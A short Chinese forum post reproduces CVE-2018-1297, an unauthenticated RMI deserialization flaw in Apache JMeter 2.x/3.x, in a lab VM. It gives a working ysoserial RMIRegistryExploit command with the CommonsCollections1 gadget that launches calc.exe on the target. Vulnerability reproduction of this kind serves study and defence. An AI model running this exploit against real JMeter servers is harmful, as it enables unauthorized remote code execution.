-
-
[原创]CVE-2018-1297jmeter_RMI漏洞复现
-
发表于: 2018-2-28 15:43
-
Apache JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编写的用于压力测试和性能测试的开源软件。
Apache JMeter 2.x版本和3.x版本中存在安全漏洞。攻击者可利用该漏洞获取JMeterEngine的访问权限并发送未授权的代码。
目标环境:虚拟机windows server 2008 R2、 jre 1.8.0_66
IP: 192.168.153.132
受影响版本为Apache JMeter 2.x版本和3.x ,这里选取了jmeter-2.13,JMeter历史版本下载地址为:http://archive.apache.org/dist/jmeter/binaries/
运行jmeter-server.bat即可启动JMeter服务,RMI 1099端口同时已经开启:
使用ysoserial对目标发送具有指定payload的数据包:
java -cp ysoserial-0.0.5-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 192.168.153.132 1099 CommonsCollections1 "calc.exe"
目标已经执行了calc.exe程序:
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
最后于 2018-3-4 12:14
被cnsecurity编辑
,原因:
|
|
|---|---|
